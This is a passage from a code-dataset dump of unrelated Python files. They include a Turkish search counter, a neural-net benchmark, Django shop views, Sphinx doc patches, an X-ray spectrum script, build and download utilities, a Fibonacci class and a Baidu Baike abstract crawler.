print(\"Ücretli Arama Kanalından Çıkış Yaptınız Akabinde Sosyal Medya Arama Kanalına Geçiş Yaptınız.\")\r\n break\r\n elif y==\"q\":\r\n continue\r\n\r\n\r\nwhile True:\r\n z=input(\"SOSYAL MEDYA ARAMASI-Aramak istediğiniz bilgiyi yazınız.(Sosyal Medya Arama Kanalından Çıkış için 'q' bas.)\")\r\n sosyalmedya.append(z)\r\n print(\"Sosyal Medya Arama Geçmişine Bir Bilgi Eklenerek +1 Arttırıldı.\")\r\n print(len(sosyalmedya))\r\n if z==\"q\":\r\n print(\"Sosyal Medya Arama Kanalından Çıkış Yaptınız.\")\r\n break\r\n elif z==\"q\":\r\n continue\r\n \r\n\r\n\r\n\r\ndef saydır(organık):\r\n h=input(\"Organik Reklam Araması Saydırmak İçin k Tuşuna Basınız.\")\r\n if h==\"k\":\r\n print(\"Organik Reklam Arama Sayısı:\",len(organık))\r\n \r\nsaydır(organık)\r\n\r\ndef saydır2(ucretlıreklam):\r\n m=input(\"Ücretli Reklam Araması Saydırmak İçin b Tuşuna Basınız.\")\r\n if m==\"b\":\r\n print(\"Ücretli Reklam Arama Sayısı:\",len(ucretlıreklam))\r\n \r\nsaydır2(ucretlıreklam)\r\n\r\ndef saydır3(sosyalmedya):\r\n n=input(\"Sosyal Medya Araması Saydırmak İçin v Tuşuna Basınız.\")\r\n if n==\"v\":\r\n print(\"Sosyal Medya Araması Sayısı:\",len(sosyalmedya))\r\n \r\nsaydır3(sosyalmedya)\r\n\r\n\r\nif len(organık) > len(ucretlıreklam):\r\n print(\"Organik Arama Sayısı Ücretli Reklam Arama Sayısından Daha Fazladır.\")\r\nelse :\r\n print(\"Ücretli Reklam Arama Sayıı Organik Reklam Arama Sayısından Daha Fazladır.\")\r\n\r\nif len(organık) > len(sosyalmedya):\r\n print(\"Organik Arama Sayısı Sosyal Medya Arama Sayısından Daha Fazladır.\")\r\nelse :\r\n print(\"Sosyal Medya Arama Sayısı Organik Arama Sayısından Daha Fazladır.\")\r\nif len(sosyalmedya) > len(ucretlıreklam):\r\n print(\"Sosyal Medya Arama Sayısı Ücretli Reklam Arama Sayısından Daha Fazladır.\")\r\nelse :\r\n print(\"Ücretli Reklam Arama Sayısı Sosyal Medya Arama Sayısından Daha Fazladır.\")\r\n \r\n \r\n\r\n\r\n 
\r\n","sub_path":"while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"209520031","text":"import sys\nimport numpy\ntry:\n from sklearn import datasets\nexcept:\n print(\"scikit-learn is required to run this example.\")\n exit(1)\ntry:\n from openann import *\nexcept:\n print(\"OpenANN Python bindings are not installed!\")\n exit(1)\n\n#NOTE: LABELS ARE 0-INDEXED, UNLIKE WITH LOGISTIC REGRESSION\n\nHOG_TRAINING_DATA = 'data/hog_training_data.npy'\nHOG_TRAINING_LABELS = 'data/hog_training_labels.npy'\nHOG_TESTING_DATA = 'data/hog_testing_data.npy'\nHOG_TESTING_LABELS = 'data/hog_testing_labels.npy'\n\ndef print_usage():\n print(\"Usage:\")\n print(\" python benchmark [run]\")\n\ndef run_ann():\n\n train_labels = numpy.load(HOG_TRAINING_LABELS)\n train_features = numpy.load(HOG_TRAINING_DATA)\n test_labels = numpy.load(HOG_TESTING_LABELS)\n test_features = numpy.load(HOG_TESTING_DATA)\n\n total_features = numpy.concatenate((train_features, test_features), axis=0)\n total_labels = numpy.concatenate((train_labels, test_labels), axis=0)\n\n X = numpy.array(total_features)\n Y = numpy.array(total_labels)\n Y = Y - 1\n D = X.shape[1]\n F = len(numpy.unique(Y))\n N = len(X)\n\n # Preprocess data (normalization and 1-of-c encoding)\n stds = X.std(axis=0)\n for i in range (0, len(stds)):\n if stds[i] == 0:\n stds[i] = 1\n X = (X - X.mean(axis=0)) / stds\n T = numpy.zeros((N, F))\n T[(range(N), Y)] = 1.0\n\n # Setup network\n net = Net()\n net.set_regularization(0.01, 0.01, 0)\n net.input_layer(D)\n net.fully_connected_layer(100, Activation.LOGISTIC)\n net.output_layer(F, Activation.SOFTMAX)\n net.set_error_function(Error.CE)\n\n # Split dataset into training set and validation set and make sure that\n # each class is equally distributed in the datasets\n X1 = numpy.vstack((X[0:(N//2)]))\n T1 = numpy.vstack((T[0:(N//2)]))\n training_set = DataSet(X1, T1)\n X2 = numpy.vstack((X[(N//2):]))\n T2 = numpy.vstack((T[(N//2):]))\n validation_set = DataSet(X2, T2)\n\n # Train for 30 episodes (with tuned parameters for MBSGD)\n optimizer = MBSGD({\"maximal_iterations\": 30}, learning_rate=0.9,\n learning_rate_decay=0.999, min_learning_rate=0.001, momentum=0.5,\n batch_size=128)\n Log.set_info() # Deactivate debug output\n optimizer.optimize(net, training_set)\n\n print(\"TF data set has %d inputs, %d classes and %d examples\" % (D, F, N))\n print(\"The data has been split up into training and validation set.\")\n training_percent = float(classification_hits(net, training_set)) / len(X1)\n testing_percent = float(classification_hits(net, validation_set)) / len(X2)\n print(\"Correct predictions on training set: %d/%d, and percent is: %f\"\n % (classification_hits(net, training_set), len(X1), training_percent))\n print(\"Confusion matrix:\")\n print(confusion_matrix(net, training_set)[0])\n print(\"Correct predictions on test set: %d/%d, and percent is: %f\"\n % (classification_hits(net, validation_set), len(X2), testing_percent))\n print(\"Confusion matrix:\")\n print(confusion_matrix(net, validation_set)[0])\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n print_usage()\n\n for command in sys.argv[1:]:\n if command == \"run\":\n run_ann()\n\n else:\n print_usage()\n exit(1)","sub_path":"src/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"255842924","text":"from 
django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render, redirect\nfrom django.utils import timezone\n\nfrom django.views.generic import ListView\nfrom django.views.generic.base import View\n\nfrom apps.order.models import Cart, CartItem, Order\nfrom apps.product.models import Product\n\nfrom .forms import OrderForm\nfrom .permissions import SuperUserAdminMixin\n\nUser = get_user_model()\n\n\nclass IndexAdminView(SuperUserAdminMixin, ListView):\n model = Order\n template_name = 'order/index_admin_panel.html'\n context_object_name = 'orders'\n\n def get_queryset(self):\n queryset = super(IndexAdminView, self).get_queryset()\n today_ = timezone.now().date()\n queryset = queryset.filter(create_at__date=today_).order_by('-create_at')\n return queryset\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data()\n context['count'] = Order.objects.count()\n return context\n\n\n\ndef order_detail(request):\n return render(request, 'order/order_detail.html')\n\n\nclass CartItemView(View):\n\n def get(self, request, *args, **kwargs):\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user)\n cart_items = CartItem.objects.filter(cart=cart)\n context = {\n 'cart': cart,\n 'cart_items': cart_items,\n }\n return render(request, 'order/cart_checkout.html', context)\n\n\n\nclass AddToCartView(View):\n\n def get(self, request, *args, **kwargs):\n product_id = kwargs.get('pk')\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user, in_order=False)\n product_info = Product.objects.get(pk=product_id)\n CartItem.objects.get_or_create(cart=cart, product=product_info, final_price=product_info.price)\n messages.add_message(request, messages.INFO, 'Продукт успешно добавлен!')\n return redirect('cart')\n\n\nclass DeleteCartItemView(View):\n\n def get(self, request, *args, **kwargs):\n product_id = kwargs.get('pk')\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user, in_order=False)\n product_id = Product.objects.get(pk=product_id)\n cart_product = CartItem.objects.get(cart=cart, product=product_id)\n cart_product.delete()\n cart.save()\n messages.add_message(request, messages.INFO, 'Продукт успешно удален!')\n return redirect('cart')\n\n\nclass ChangeQuantityView(View):\n\n def post(self, request, *args, **kwargs):\n product_id = kwargs.get('pk')\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user, in_order=False)\n product_id = Product.objects.get(pk=product_id)\n cart_product = CartItem.objects.get(cart=cart, product=product_id)\n qty = int(request.POST.get('change_qty'))\n cart_product.qty = qty\n cart_product.final_price = cart_product.product.price * cart_product.qty\n cart_product.save()\n cart.save()\n messages.add_message(request, messages.INFO, 'Количество успешно изменено!')\n return redirect('cart')\n\n\nclass OrderCheckoutView(View):\n\n def get(self, request, *args, **kwargs):\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user)\n cart_items = CartItem.objects.filter(cart=cart)\n form = OrderForm(request.POST, None)\n context = {\n 'cart': cart,\n 'cart_items': cart_items,\n 'form': form,\n }\n return render(request, 'order/order_checkout.html', context)\n\n\nclass MakeOrderView(View):\n\n def post(self, request, *args, **kwargs):\n user = User.objects.get(email=request.user.email)\n cart = Cart.objects.get(owner=user)\n form = 
OrderForm(request.POST, None)\n if form.is_valid():\n new_order = form.save(commit=False)\n cart.in_order = True\n new_order.cart = cart\n new_order.customer = user\n new_order.save()\n messages.add_message(request, messages.INFO, 'Спасибо за заказ! Менеджер с Вами свяжется')\n return redirect('index')\n return redirect('order_checkout')\n\n\nclass UpdateOrderAdminView(View):\n\n def post(self, request, *args, **kwargs):\n pass","sub_path":"apps/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"8737807","text":"# type: ignore\n\nfrom typing import get_type_hints, Any, List, Optional, Type, Tuple\n\nfrom django.db.models.base import Model\nfrom django.db.models.fields import AutoField\nfrom django.db.models.fields.related_descriptors import (\n ForeignKeyDeferredAttribute,\n ReverseManyToOneDescriptor,\n ReverseOneToOneDescriptor,\n)\nfrom django.db.models.manager import ManagerDescriptor\nfrom django.db.models.query import QuerySet\nfrom django.db.models.query_utils import DeferredAttribute\n\nfrom sphinx.application import Sphinx\nfrom sphinx.ext.autodoc import DataDocumenter, Options, PropertyDocumenter\n\n\ndef _get_module(cls: Optional[Type]) -> str:\n if not hasattr(cls, '__module__'):\n return 'builtins'\n if not cls.__module__.startswith('django'):\n return cls.__module__.lstrip('_')\n django_references = {\n 'django.db.models',\n 'django.forms',\n 'django.contrib.admin',\n 'django.http',\n 'django.core.files',\n 'django.apps',\n 'django.core.management',\n }\n excluded_names = {\n 'QuerySet',\n 'FieldFile',\n 'FileSystemStorage',\n 'BaseInlineFormSet',\n }\n for ref in django_references:\n if cls.__name__ in excluded_names:\n continue\n if cls.__module__.startswith(ref):\n return ref\n return cls.__module__\n\n\ndef _patched_add_directive_header(self: DataDocumenter, sig: str):\n # Don't document values of settings\n if self.modname == 'MangAdventure.settings':\n super(DataDocumenter, self).add_directive_header(sig)\n else:\n self._original_add_directive_header(sig)\n\n\ndef _patched_can_document_member(cls: Type[PropertyDocumenter],\n member: Any, membername: str,\n isattr: bool, parent: Any) -> bool:\n return member.__class__.__name__ == 'cached_property' or \\\n cls._original_can_document_member(member, membername, isattr, parent)\n\n\ndef apply_patches(app: Sphinx):\n import sphinx_autodoc_typehints\n\n sphinx_autodoc_typehints.get_annotation_module = _get_module\n\n PropertyDocumenter._original_can_document_member = \\\n PropertyDocumenter.can_document_member\n PropertyDocumenter.can_document_member = \\\n classmethod(_patched_can_document_member)\n\n DataDocumenter._original_add_directive_header = \\\n DataDocumenter.add_directive_header\n DataDocumenter.add_directive_header = _patched_add_directive_header\n\n ManagerDescriptor.__get__ = lambda self, *args, **kwargs: self.manager\n\n QuerySet.__repr__ = lambda self: self.__class__.__name__\n\n\ndef skip_django_junk(app: Sphinx, what: str, name: str,\n obj: Any, skip: bool, options: Options) -> bool:\n junk = (\n ForeignKeyDeferredAttribute,\n ReverseManyToOneDescriptor,\n ReverseOneToOneDescriptor,\n )\n if isinstance(obj, junk):\n return True\n if isinstance(obj, property):\n return name == 'media' or skip\n if isinstance(obj, DeferredAttribute):\n return isinstance(obj.field, AutoField) or skip\n return name == 'do_not_call_in_templates' or skip\n\n\ndef process_signature(app: Sphinx, what: 
str, name: str, obj: Any, options:\n Options, signature: Optional[str], return_annotation:\n Optional[str]) -> Tuple[Optional[str], Optional[str]]:\n if what != 'class':\n return signature, return_annotation\n if issubclass(obj, Model):\n signature, return_annotation = '(*args, **kwargs)', None\n for idx, base in enumerate(obj.__bases__):\n module = _get_module(base)\n if module != 'builtins':\n obj.__bases__[idx].__module__ = module\n return signature, return_annotation\n\n\ndef process_docstring(app: Sphinx, what: str, name: str, obj:\n Any, options: Options, lines: List[str]):\n if obj is None or not lines:\n return\n # this class is broken for some reason\n if name[:28] == 'users.forms.UserProfileForm.':\n cls = {\n 'email': 'EmailField', 'avatar': 'ImageField'\n }.get(name[28:], 'CharField')\n lines[0] = f':class:`~django.forms.{cls}` - {lines[0]}'\n return\n # this one too\n if name == 'users.admin.UserForm.is_scanlator':\n lines[0] = f':class:`~django.forms.BooleanField` - {lines[0]}'\n return\n if what == 'attribute':\n cls = getattr(obj, 'field', obj).__class__\n elif what == 'property':\n func = getattr(obj, 'fget', obj.func)\n cls = get_type_hints(func)['return']\n else:\n return\n if cls.__module__ == 'builtins':\n qname = cls.__name__\n elif cls.__name__ in {'dict', 'list', 'tuple'}:\n qname = f'typing.{cls.__name__.capitalize()}'\n else:\n qname = f'{_get_module(cls)}.{cls.__name__}'\n lines[0] = f':class:`~{qname}` – {lines[0]}'\n\n\ndef setup(app: Sphinx):\n app.connect('builder-inited', apply_patches)\n app.connect('autodoc-skip-member', skip_django_junk)\n app.connect('autodoc-process-signature', process_signature)\n app.connect('autodoc-process-docstring', process_docstring)\n app.add_css_file('css/style.css')\n","sub_path":"docs/_ext/mangadventure_patches.py","file_name":"mangadventure_patches.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"191565711","text":"\n\n\"\"\"\nplots the AGN spectra from the torus model for different obscuration levels.\n\noutput:\n/home/comparat/wwwDir/eRoMok/taurus/*.png\n\"\"\"\nimport xspec\nimport numpy as n\nimport sys\nimport astropy.units as uu\nimport astropy.constants as cc \nfrom scipy.interpolate import interp1d\nfrom scipy.integrate import quad\n\nxspec.Xset.cosmo = \"67.77 0. 0.692885\"\nPL=1.9\n#xspec.Xset.cosmo = \"50. 0. 0.5\"\n#xspec.Response()\n\n#s1 = xspec.Spectrum(\"arf01_100nmAl_200nmPI_sdtq.fits\")\n#b1 = s1.background\n#r1 = s1.response\n#arfFileName = r1.arf\n\nnh_vals = 10**n.arange(-2,4+0.01,2.)#0.05)\nz_vals = n.arange(0., 4.1, 1.)\n\nnh_val = 1000.# nh_vals[0]\nredshift = 2. 
# z_vals[0]\n\n\nll_05 = (cc.c * cc.h / (0.5*uu.keV).to(uu.J)).to(uu.AA)\nll_2 = (cc.c * cc.h / (2.0*uu.keV).to(uu.J)).to(uu.AA)\nll_10 = (cc.c * cc.h / (10*uu.keV).to(uu.J)).to(uu.AA)\n\n\n#fs1 = xspec.FakeitSettings(os.path.join(os.environ['DARKSIM_DIR'], 'model', \"arf01_100nmAl_200nmPI_sdtq.fits\"), exposure = 1500.0)\n#fs1.background = \"none\"\n\nimport matplotlib\nmatplotlib.use('Agg')\nmatplotlib.rcParams.update({'font.size': 14})\nimport matplotlib.pyplot as p\nimport numpy as n\nimport os\n#torus_model = os.path.join(os.environ['DARKSIM_DIR'], 'model', 'torus1006.fits')\n#print(torus_model)\n\n## reproduce the model from Aird 2015\n\n\ndef get_spec(\n\tnh_val = 1\n\t,PL=1.9 \n\t,redshift=0.\n\t,norm1 = 0.98\n\t,norm2 = 0.02\n\t,norm3 = 1.\n\t,rel_refl= 1.\n\t,incl = n.cos(30.*n.pi/180.)\n\t):\n\n\tm1 = xspec.Model(\"zwabs*(cabs*zpowerlw*zhighect+pexrav)+zpowerlw\")\n\n\tm1.setPars(\n\tnh_val, #2 2 zwabs nH 10^22 1.00000 +/- 0.0 \n\tredshift, #3 2 zwabs Redshift 0.0 frozen\n\tnh_val, #4 3 cabs nH 10^22 1.00000 +/- 0.0 \n\tPL, #5 4 zpowerlw PhoIndex 1.00000 +/- 0.0 \n\tredshift, #6 4 zpowerlw Redshift 0.0 frozen\n\tnorm1, #7 4 zpowerlw norm 1.00000 +/- 0.0 \n\t50., #8 5 zhighect cutoffE keV 10.0000 +/- 0.0 \n\t200., #9 5 zhighect foldE keV 15.0000 +/- 0.0 \n\tredshift, #10 5 zhighect Redshift 0.0 frozen\n\tPL, #16 8 pexrav PhoIndex 2.00000 +/- 0.0 \n\t200., #17 8 pexrav foldE keV 100.000 +/- 0.0 \n\trel_refl, #18 8 pexrav rel_refl 0.0 +/- 0.0 \n\tredshift, #19 8 pexrav Redshift 0.0 frozen\n\t1., #20 8 pexrav abund 1.00000 frozen\n\t1., #21 8 pexrav Fe_abund 1.00000 frozen\n\tincl, #22 8 pexrav cosIncl 0.450000 frozen\n\tnorm3, #23 8 pexrav norm 1.00000 +/- 0.0 \n\tPL, #11 6 zpowerlw PhoIndex 1.00000 +/- 0.0 \n\tredshift, #12 6 zpowerlw Redshift 0.0 frozen\n\tnorm2 #13 6 zpowerlw norm 1.00000 +/- 0.0 \n\t)\n\n\n\t#kevs = n.arange(0.1, 50, 0.1) #\n\tkevs = 10**n.arange(-1.,n.log10(50),0.01)\n\tfluxes = []\n\tnPh = []\n\tfor kev_min_erosita_RF, kev_max_erosita_RF in zip(kevs[:-1],kevs[1:]):\n\t\txspec.AllModels.calcFlux(str(kev_min_erosita_RF)+\" \"+str(kev_max_erosita_RF))\n\t\t#print(xspec.Xset.cosmo)\n\t\t#xspec.AllModels.calcLumin(str(kev_min_erosita_RF)+\" \"+str(kev_max_erosita_RF))\n\t\tfluxes.append( m1.flux[0] )\n\t\tnPh.append(m1.flux[3] )\n\t\tx,y,nP,dE = (kevs[:-1]+kevs[1:])*0.5, n.array(fluxes), n.array(nPh), -kevs[:-1]+kevs[1:]\n\n\t# x keV\n\t# y/dE erg/(cm$^2$ s keV)\n\t# nP number of photons\n\t# energy interval\n\t# E = hc/lambda\n\t# x * y / dE = nu * f_nu = ll * f_ll\n\n\tll = (cc.c * cc.h / (x*uu.keV).to(uu.J)).to(uu.AA)\n\n\tf_ll = x * y / (dE * ll ) # erg/(cm$^2$ s A)\n\n\treturn ll, f_ll, x, y/dE, nP, dE\n\n\ndef get_ratio(ll, f_ll_20):\n\titp = interp1d(ll, f_ll_20/n.median(f_ll_20))\n\tF2_10 = quad(itp, ll_10.value, ll_2.value)[0]\n\tF05_2 = quad(itp, ll_2.value, ll_05.value)[0]\n\treturn F05_2/F2_10\n\nnh_vals = 10**n.arange(-2.1,4.11,0.1)#0.05)\nratios = n.zeros_like(nh_vals)\nfor ii, nh_val in enumerate(nh_vals):\n\tll, f_ll, x, fnu, nP, dE = get_spec( nh_val )\n\tn.savetxt(os.path.join('xspectrum-flambda-'+str(n.round(n.log10(nh_val),1))+'.txt'), n.transpose([ll, f_ll, x, fnu, nP, dE]) )\n\tratios[ii] = get_ratio(ll, f_ll)\n\nn.savetxt(os.path.join(os.environ['GIT_VS'], 'data', 'xray_k_correction', 'hard-2-soft-z0.txt'), n.transpose([n.log10(nh_vals*1e22), ratios]) )\n\np.figure(1, (6,6))\np.plot(nh_vals*1e22, ratios)\np.xscale('log')\np.yscale('log')\np.xlabel(r'$\\log_{10}(n_H)$')\np.ylabel('$F_{0.5-2}/F_{2-10}$')\n#p.legend(frameon=False, loc=0, 
fontsize=9)\np.tight_layout() \np.savefig(os.path.join(os.environ['GIT_VS'], 'figures', 'MD10/agn/NH', 'hard-2-soft-z0.png'))\np.clf()\n\n\nll, f_ll_20, x, fnu, nP, dE = get_spec( nh_val = 0.01, PL=1.9 )\nll, f_ll_21, x, fnu, nP, dE = get_spec( nh_val = 0.1, PL=1.9 )\nll, f_ll_22, x, fnu, nP, dE = get_spec( nh_val = 1, PL=1.9 )\nll, f_ll_23, x, fnu, nP, dE = get_spec( nh_val = 10, PL=1.9 )\nll, f_ll_24, x, fnu, nP, dE = get_spec( nh_val = 100, PL=1.9 )\nll, f_ll_25, x, fnu, nP, dE = get_spec( nh_val = 1000, PL=1.9 )\nll, f_ll_26, x, fnu, nP, dE = get_spec( nh_val = 10000, PL=1.9 )\n\n\np.figure(1, (7,4))\np.axvline(ll_05.value, label = '0.5 keV')\np.axvline(ll_2.value, label = '2 keV', ls='dashed')\np.axvline(ll_10.value, label = '10 keV', ls='dotted')\np.plot(ll, f_ll_20, label='20')\np.plot(ll, f_ll_21, label='21')\np.plot(ll, f_ll_22, label='22')\np.plot(ll, f_ll_23, label='23')\np.plot(ll, f_ll_24, label='24')\np.plot(ll, f_ll_25, label='25')\np.plot(ll, f_ll_26, label='26')\np.xscale('log')\np.yscale('log')\np.xlabel('wavelength [Angstrom]')\np.ylabel('flux density $f_\\lambda$ [erg/(cm$^2$ s A)]')\np.legend(frameon=False, loc=0, fontsize=9)\np.tight_layout() \np.savefig('ll_f_ll.png')\np.clf()\n","sub_path":"xspec/tabulate_xray_spectra_flambda_RF_soft_hard_conversion.py","file_name":"tabulate_xray_spectra_flambda_RF_soft_hard_conversion.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296020550","text":"from subprocess import run, CalledProcessError\nimport sys, os, shutil\nfrom .prompt import prompt_confirm\n\njoinp = os.path.join\n\ndef gradle(task, params={}, spinner=None, verbose=False):\n command = './gradlew {}' .format(task)\n for key in params:\n command += ' ' + '-P{}={}'.format(key, params[key])\n return run_command(command, spinner=spinner, verbose=verbose)\n\n\ndef run_command(task, spinner=None, verbose=False, stop_spinner_on_success=True):\n try:\n if verbose and spinner:\n spinner.hide()\n p = run(task, shell=True, check=True, capture_output=not verbose)\n if verbose and spinner:\n spinner.show()\n if stop_spinner_on_success and spinner:\n spinner.succeed()\n\n return True\n except CalledProcessError as e:\n if spinner:\n spinner.fail()\n if not verbose and prompt_confirm('The command failed, should I print the output?', True):\n sys.stdout.write(e.stdout.decode('utf-8'))\n sys.stderr.write(e.stderr.decode('utf-8'))\n return False\n\n\ndef start_spinner(message):\n from yaspin import yaspin\n spinner = yaspin(text=message)\n\n _ok = spinner.ok\n _fail = spinner.fail\n \n def succeed():\n spinner.color = 'green'\n _ok(\" ✔ \")\n\n def fail():\n spinner.color = 'red'\n _fail(\" ✘ \")\n\n spinner.succeed = succeed\n spinner.ok = succeed\n spinner.fail = fail\n\n spinner.start()\n return spinner\n\ndef log_success(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'green'\n spinner.ok(' ✔ ')\n\ndef log_fail(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'red'\n spinner.ok(' ✘ ')\n\ndef log_info(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'blue'\n spinner.ok(' 🛈 ')\n\ndef log_warn(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'yellow'\n spinner.ok(' ⚠ ')\n\n\ndef project_path(path):\n return joinp(os.path.dirname(os.path.dirname(__file__)), path)\n\n\ndef temp_path(path):\n from .config import config\n return os.path.join(config._tmp_dir, path)\n\ndef 
def start_spinner(message):\n    from yaspin import yaspin\n    spinner = yaspin(text=message)\n\n    _ok = spinner.ok\n    _fail = spinner.fail\n    \n    def succeed():\n        spinner.color = 'green'\n        _ok(\" ✔ \")\n\n    def fail():\n        spinner.color = 'red'\n        _fail(\" ✘ \")\n\n    spinner.succeed = succeed\n    spinner.ok = succeed\n    spinner.fail = fail\n\n    spinner.start()\n    return spinner\n\ndef log_success(message):\n    from yaspin import yaspin\n    spinner = yaspin(text=message).bold\n    spinner.color = 'green'\n    spinner.ok(' ✔ ')\n\ndef log_fail(message):\n    from yaspin import yaspin\n    spinner = yaspin(text=message).bold\n    spinner.color = 'red'\n    spinner.ok(' ✘ ')\n\ndef log_info(message):\n    from yaspin import yaspin\n    spinner = yaspin(text=message).bold\n    spinner.color = 'blue'\n    spinner.ok(' 🛈 ')\n\ndef log_warn(message):\n    from yaspin import yaspin\n    spinner = yaspin(text=message).bold\n    spinner.color = 'yellow'\n    spinner.ok(' ⚠ ')\n\n\ndef project_path(path):\n    return joinp(os.path.dirname(os.path.dirname(__file__)), path)\n\n\ndef temp_path(path):\n    from .config import config\n    return os.path.join(config._tmp_dir, path)\n\ndef cwd(path, create=False):\n    if not os.path.exists(path):\n        if create:\n            os.makedirs(path)\n        else:\n            raise ValueError('Path {} does not exist'.format(path))\n    os.chdir(path)\n\n\ndef exists(path):\n    return os.path.exists(path)\n\ndef download(url, output, redownload=False):\n    from tqdm import tqdm\n    import requests\n    import math\n\n    if not redownload and os.path.exists(output):\n        return\n\n    r = requests.get(url, stream=True)\n\n    total_size = int(r.headers.get('content-length', 0))\n    block_size = 1024\n    wrote = 0\n    with open(output, 'wb') as f:\n        progress = tqdm(\n            r.iter_content(block_size),\n            total=math.ceil(total_size / block_size),  # true division: with '//' the ceil was a no-op\n            unit='KB', unit_scale=True,\n            desc='Downloading {}'.format(os.path.basename(output))\n        )\n        for data in progress:\n            wrote = wrote + len(data)\n            f.write(data)\n\n    if total_size != 0 and wrote != total_size:\n        print(\"ERROR, something went wrong\") \n\n\ndef extract_from(zip, target_file, output_path='.'):\n    import zipfile, fnmatch\n    with zipfile.ZipFile(zip) as zip_file:\n        for member in zip_file.namelist():\n            if fnmatch.fnmatch(member, target_file):\n                filename = os.path.basename(member)\n                if not filename:\n                    continue\n                source = zip_file.open(member)\n                target = open(os.path.join(output_path, filename), \"wb\")\n                with source, target:\n                    shutil.copyfileobj(source, target)\n\n\ndef copy(from_path, to_path):\n    import glob\n    for src in glob.glob(from_path):\n        shutil.copy(src, to_path)\n\ndef mkdir(path):\n    if not os.path.exists(path):\n        os.makedirs(path)","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"210509624","text":"class fibonacci():\n    def __init__(self,number):\n        self.number=number\n        self.a=0\n        self.b=1\n        self.count=0\n    def fibo(self):\n        if self.number==0:\n            return self.a\n        if self.number==1:\n            return self.b\n        if self.count==self.number-2:\n            return self.b+self.a\n        self.a,self.b=self.b,self.a+self.b\n        self.count+=1\n        return self.fibo()\n
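\n# Illustrative usage (editor's note, not in the original file): fibo() advances the\n# (a, b) pair recursively until count reaches number-2, so the class computes F(number):\n#     print(fibonacci(10).fibo())  # -> 55\n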
","sub_path":"pythonlab3/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"276865571","text":"from bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom queue import Queue\nimport datetime\nimport re\nfrom MilitaryKG.tools.html_paser import html_paser\nfrom MilitaryKG.tools.MyThreadPool import MyThreadPool\nfrom MilitaryKG.Pre.GetEntitySet import GetWeaponSet,GetWarSet,GetCompanySet\n\nclass Producer(object):\n    @staticmethod\n    def producer(q, data):\n        q.put(data)\n\ndef insertDB(data):\n    fp.write(str(data)+'\\n')\n    fp.flush()\n\n# build the producer queue\ndef product_data(title):\n    entity_queue = Queue()\n    eval_str = 'Get'+title+'Set()'\n    entity_set = eval(eval_str)\n    for item in entity_set:\n        Producer.producer(entity_queue, item)\n    return entity_queue\n\n# crawl a single page\ndef turn_page_thread(submission):\n    url_pre = \"https://baike.baidu.com/item/\"\n    url = url_pre+submission\n    html = html_paser(url, 'utf-8')\n    if html == 0:\n        return\n    pattern = re.compile('main-content')\n    if re.search(pattern, html) is None:\n        return\n    soup = bs(html, 'html.parser')\n    box = soup.find(attrs={'class': 'lemma-summary'})\n    if box is None:\n        return\n    info = box.findAll(attrs={'class' : 'para' })\n    if len(info) == 0:\n        return\n    text = ''  # renamed from 'str' to avoid shadowing the builtin\n    for item in info:\n        text += item.text\n    triple = [submission, 'abstract', text]\n    Producer.producer(entity_queue, triple)\n\nmaxsize = 25\nprint(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n# titles = ['Weapon','War','Company']\ntitles = ['Weapon']\n\nfor title in titles:\n    save_path = \"../../data/baidubaike/\" + title + \"_abstract.txt\"\n    fp = open(save_path, 'w+', encoding='utf-8')\n\n    q = product_data(title)\n    entity_queue = Queue()\n    pool = MyThreadPool()\n    pool.addthread(queue=q, size=maxsize, func=turn_page_thread, timeout=15)\n    pool.addthread(queue=entity_queue, size=1, func=insertDB, timeout=20)\n    pool.startAll()\n    pool.joinAll()\n    fp.close()\n    print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), \"finished\")\n\n\n","sub_path":"Crawler/baidubaike/entity_abstract.py","file_name":"entity_abstract.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
